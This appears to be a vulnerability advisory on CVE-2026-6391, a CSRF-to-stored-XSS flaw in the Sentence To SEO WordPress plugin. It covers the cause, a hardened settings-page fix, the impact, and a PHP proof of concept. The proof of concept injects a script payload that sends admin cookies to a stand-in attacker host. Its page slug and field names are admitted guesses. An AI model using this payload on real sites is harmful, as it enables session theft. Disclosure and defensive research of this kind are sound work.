Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 21, 2026

CVE-2026-6391: Sentence To SEO (keywords, description and tags) <= 1.0 – Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page Parameters (sentence-to-seo)

CVE ID CVE-2026-6391
Severity Medium (CVSS 6.1)
CWE 352
Vulnerable Version 1.0
Patched Version None available at time of analysis
Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6391 (metadata-based): This vulnerability affects the Sentence To SEO (keywords, description and tags) plugin for WordPress, version 1.0 and earlier. The plugin fails to implement Cross-Site Request Forgery (CSRF) protection on its settings page, specifically within the create_admin_page() function. This allows an unauthenticated attacker to trick a site administrator into performing unintended actions, leading to Stored Cross-Site Scripting (XSS) via plugin settings parameters. The CVSS score is 6.1 (Medium), with a vector indicating a network attack vector, low attack complexity, no privileges required, user interaction required, a changed scope, and low (limited) confidentiality and integrity impact.

The root cause is the missing or incorrect nonce validation on the create_admin_page() function. In WordPress, nonces are security tokens that verify the intent of a user submitting a form or making a request. Admin settings pages typically include nonce fields in forms and validate them on submission. Atomic Edge analysis infers that the plugin’s settings page processes and saves user input (e.g., keywords, description, tags) without checking a nonce. Since Stored XSS is also mentioned, the plugin likely saves unsanitized input to the database and displays it without proper escaping. This inference is based on the CWE classification (352) and the vulnerability description; no code diff is available for confirmation.

Exploitation requires an attacker to craft a malicious HTML page with a form that automatically submits to the plugin’s settings page URL. The form POSTs to a WordPress admin URL such as /wp-admin/options-general.php?page=sentence-to-seo; the exact admin page slug is inferred from the plugin name and is not confirmed. The attacker includes malicious JavaScript payloads in plugin-specific parameter names such as seo_keywords, seo_description, or seo_tags (also inferred). The attacker then lures an authenticated administrator to click a link or visit the crafted page. The browser attaches the administrator's valid session cookies, and the forged request modifies the plugin settings, injecting the XSS payload into the database. When the settings page is later viewed, the stored script executes in the admin’s browser context.

Remediation requires the plugin developer to implement proper CSRF protection in the create_admin_page() function. The fix should include a WordPress nonce field using wp_nonce_field() in the form and verify it with check_admin_referer() or wp_verify_nonce() on form submission. Additionally, all input fields must be sanitized with functions like sanitize_text_field() before database storage, and output must be escaped with esc_html() or similar. Since no patched version is available, site administrators should disable or remove the plugin until a security update is released.
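The following is an added example, not the plugin's own code, showing the nonce validation described in the root-cause paragraph and the full remediation described above in one hardened create_admin_page(). The option name (sentence_to_seo_options), the nonce action and field names (sentence_to_seo_save, sentence_to_seo_nonce, sts_save) and the function prefix are assumptions; the three settings field names are the ones the analysis infers.

```php
<?php
// Added example (not the plugin's own code): a create_admin_page() written the way
// the remediation describes. Option name, nonce action/field names and the sts_
// prefix are assumptions; seo_keywords/seo_description/seo_tags are the inferred names.

function sts_example_create_admin_page() {
    // Capability check: only users who may manage options reach this page at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You do not have permission to access this page.', 'sentence-to-seo' ) );
    }

    $fields  = array( 'seo_keywords', 'seo_description', 'seo_tags' );
    $options = get_option( 'sentence_to_seo_options', array() );

    if ( isset( $_POST['sts_save'] ) ) {
        // CSRF fix: a cross-site form cannot know the per-user, time-limited nonce,
        // so a forged POST fails here (wp_die) before any option is written.
        check_admin_referer( 'sentence_to_seo_save', 'sentence_to_seo_nonce' );

        // Stored XSS fix, part 1: sanitize on the way in. sanitize_text_field()
        // strips tags, so a <script> payload never reaches the database.
        foreach ( $fields as $field ) {
            $options[ $field ] = isset( $_POST[ $field ] )
                ? sanitize_text_field( wp_unslash( $_POST[ $field ] ) )
                : '';
        }
        update_option( 'sentence_to_seo_options', $options );
        echo '<div class="notice notice-success"><p>Settings saved.</p></div>';
    }

    // Stored XSS fix, part 2: escape on the way out as well, so a value that
    // reached the database by any other route still cannot execute.
    echo '<div class="wrap"><h1>Sentence To SEO</h1>';
    echo '<form method="post">';
    // Emits the hidden nonce field that check_admin_referer() verifies above.
    wp_nonce_field( 'sentence_to_seo_save', 'sentence_to_seo_nonce' );
    foreach ( $fields as $field ) {
        $value = isset( $options[ $field ] ) ? $options[ $field ] : '';
        printf(
            '<p><label for="%1$s">%1$s</label><br>'
            . '<input type="text" id="%1$s" name="%1$s" value="%2$s" class="regular-text"></p>',
            esc_attr( $field ),
            esc_attr( $value )
        );
    }
    echo '<p><input type="submit" name="sts_save" class="button button-primary" value="Save Settings"></p>';
    echo '</form></div>';
}
```

Two points worth noting in review: check_admin_referer() must run before any call that writes state, and the output escaping is kept even though the input is sanitized, because defence in depth on the settings page is what stops a stored payload from ever reaching an administrator's browser.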

Impact if exploited includes Stored Cross-Site Scripting, allowing an attacker to execute arbitrary JavaScript in the context of the vulnerable WordPress admin panel. The attacker could steal session cookies, modify admin pages, create new admin users, or redirect visitors to malicious sites. Since the XSS is stored, every administrator who views the plugin settings page triggers the payload. The scope change in the CVSS vector reflects that the vulnerable component affects the broader WordPress application, potentially compromising the entire site.

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6391 - Sentence To SEO (keywords, description and tags) <= 1.0 - CSRF to Stored XSS

// This PoC demonstrates how an unauthenticated attacker can trigger a CSRF attack
// to inject malicious JavaScript into the plugin settings.
// Assumes the plugin admin page is at /wp-admin/options-general.php?page=sentence-to-seo

$target_url = 'http://example.com'; // Change this to the target WordPress URL

// The plugin settings page (inferred from plugin slug)
$settings_url = $target_url . '/wp-admin/options-general.php?page=sentence-to-seo';

// Malicious XSS payload to inject into plugin settings
$xss_payload = '<script>fetch("http://attacker-controlled-server.com/steal?cookie=" + document.cookie)</script>';

// Parameters for the plugin settings (inferred parameter names)
$post_data = array(
    'seo_keywords' => $xss_payload,
    'seo_description' => $xss_payload,
    'seo_tags' => $xss_payload,
    'submit' => 'Save Settings'
);

// Initialize cURL
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIE, ''); // No cookie needed - this demonstrates CSRF from attacker's perspective

// Execute request (this would need to be triggered via an admin's browser)
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo 'Error: ' . curl_error($ch) . "\n";
} else {
    echo "CSRF request sent to: $settings_url\n";
    echo "Payload injected: $xss_payload\n";
    echo "Response headers:\n";
    echo $response;
}

// Close cURL
curl_close($ch);

// Note: This PoC demonstrates the request structure.
// In a real CSRF attack, the attacker would host an HTML page with an auto-submitting form
// that the admin visits while logged into WordPress.
?>
